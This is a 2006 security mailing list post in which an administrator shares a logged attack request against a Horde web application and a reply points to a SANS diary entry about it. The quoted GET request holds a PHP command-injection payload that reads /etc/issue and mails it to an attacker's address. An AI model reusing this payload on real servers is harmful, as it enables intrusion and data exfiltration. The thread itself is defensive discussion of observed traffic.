funsec mailing list archives
Re: interesting attack
From: Anthony Rodgers <cunningpike () gmail com>
Date: Sun, 16 Apr 2006 09:45:47 -0700
Hi Dennis,Didn't see you get any replies - what you're seeing is likely related to this:
<http://isc.sans.org/diary.php?storyid=1268> -- Anthony Rodgers cunningpike () gmail com"Genuinely objective journalism not only gets the facts right, it gets the meaning of events right. It is compelling not only today, but stands the test of time. It is validated not only by 'reliable sources', but by the unfolding of history. It is journalism that ten, twenty, fifty years after the fact still holds up a true and intelligent mirror to events." - T.D. Allman.
On 14-Apr-06, at 7:11 AM, Henderson, Dennis K. wrote:
Which web server would be a target for this GET?Not sure what group to post this to but I'm sure having fun watching theattempts.. :) GET/horde2/services/help/?show=about&module=;%22.passthru(%22cat%20% 22.chr( 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2% 20p0wd3r31337@gmail.com%22);'. HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Host: x.x.x.x Connection: Close---------------------------------------------------------------------- -------- NOTICE: This electronic mail message and any attached files are confidential. The information is exclusively for the use of the individual or entity intended as the recipient. If you are not the intended recipient, any use, copying, printing, reviewing, retention, disclosure, distribution or forwarding of the message or any attached file is not authorized and is strictly prohibited. If you have received this electronic mail message in error, please advise the sender by reply electronic mail immediately and permanently delete the original transmission, any attachments and any copies of this message from your computer system. Thank you.====================================================================== ========_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)